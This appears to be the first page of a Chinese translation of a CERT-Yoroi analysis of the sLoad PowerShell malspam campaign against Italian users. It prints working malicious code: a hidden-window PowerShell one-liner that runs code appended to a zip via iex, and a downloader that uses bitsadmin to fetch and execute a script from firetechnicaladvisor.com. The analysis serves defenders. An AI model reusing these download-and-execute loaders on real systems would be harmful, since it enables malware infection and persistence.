SLoad Powershell malspam正在蔓延到意大利[安全新闻]

一、介绍
在过去的几个月里，CERT-Yoroi观察到一种新兴攻击模式。一系列恶意电子邮件共享通用技术，这些技术可能与一个威胁组织对意大利网络全面的攻击有关。目前尚不清楚这些攻击尝试是由一个完善的网络犯罪组织修改其TTP所致，还是全新的攻击尝试。但CERT-Yoroi正在通过内部代号“Sload-ITA”（TH-163）来跟踪此威胁。去年五月，SANS ICS研究人员在英国也记录了类似的操作行为。恶意行动通过滥用基于压缩存档中的代码隐藏技术和类似的drop-url模式共享相同的drop mode：
· 2018-10-08 – 使用“/AE-9455933DGW-nota-cliente” url 模式
· 2018-10-09 – 使用“/fattura-per-cliente-QN-OAYSAPV” url 模式
· 2018-10-15 –使用“/MA-47462780Y3-documento-cliente” url 模式
· 某些恶意邮件已从“PEC”邮箱发送
· 2018-11-19 – 使用 “/documento-aggiornato-novembre-ER16909FP9”
·  CERT-PA 追踪
Yoroi-Cybaze ZLAB收集并解析了在响应操作期间恢复的样本，用来揭示这些攻击者使用的恶意植入程序的细节。下图总结了sLoad恶意软件感染的步骤。

图1. SLoad感染流程
二、技术分析
分析的恶意样本是压缩zip存档，包含两个不同文件：
1. 一个假装指向系统文件夹的链接，名为“invio fattura elettronica.lnk”
2. 一个隐藏的JPEG图像“image _20181119_100714_40.jpg”，该文件存储为HA属性。
尽管从存档中提取的LNK文件表面上看很无辜，但它的武器化方式与APT29在其最新操作期间采用的方式类似，表明该技术是几种恶意网络武器的一部分。实际上，当用户双击文件时，批处理脚本会生成下面的powershell脚本：
C:\Windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"
PS脚本搜索与模式“documento-aggiornato-novembre – * .zip”匹配的任何文件：如果文件存在，则脚本在其末尾提取一部分代码，然后通过“IEX”调用它;我们检查了zip文件并恢复了这部分代码。在下图中，可以看到附件存档内容分为粉红色和黄色，外来代码为蓝色。

图2.添加到Zip存档的代码
该部分文件包含powershell脚本调用的可执行代码。由于调用了“bitsadmin.exe”，此代码能够从“firetechnicaladvisor.com”下载其他脚本，然后将所有这些新下载的文件存储在“％APPDATA％/ ”文件夹中。下图显示了下载恶意植入程序后文件夹的内容：

图3.恶意植入程序的组件
下面的片段显示了负责下载这些恶意软件的代码。
$env_appData=$env:appdata;
$cmd='cmd';
$gen_random_value_name_ps= -join ((65..90) + (97..122) | Get-Random -count 14 | % {[char]$_});
$get_uuid=(Get-WmiObject Win32_computerSystemProduct).UUid;
$set_hidden='hidden';
$folder_to_store_file = $env_appData+'\'+$get_uuid;
$h=$folder_to_store_file+'\d'; 
   if(!(test-path $folder_to_store_file)){
   New-item -itemtype directory -Force -path $folder_to_store_file;
   };
$ps_to_download_and_execute='/c echo 1 > '+$h+'  & bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & del '+$h+' & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
$e=1;
Start-Sleep -s 6;
$p2='powe';
while($e -eq 1){
   if(test-path $h)
   Start-Sleep -s 3
   }else{
   $e=2
   }
};
Start-Sleep -s 7;
$p1='ell';
$ps_to_download_and_execute='/c '+$p2+'rsh'+$p1+' -nop -ep bypass -File '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
NxPgKLnYEhMjXT.ps1脚本安装并植入受害者的机器，在系统上注册计划任务，以确保感染持续存在。然后，该脚本会自删除。

图4.恶意植入程序的安装脚本
在快速查看CxeLtfwc.ps1脚本之后，我们还注意到恶意软件使用cmdlet“Invoke-Expression”从“config.ini”文件加载并运行另一段代码。
param ([string]$k = "");
$random_name_of_powershell=Get-Process -name powershell*;
if ($random_name_of_powershell.length -lt 2){
   $folder_name = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
   $log = $env:APPDATA+"\"+$folder_name;

[1] [2] [3] [4] [5] [6]  下一页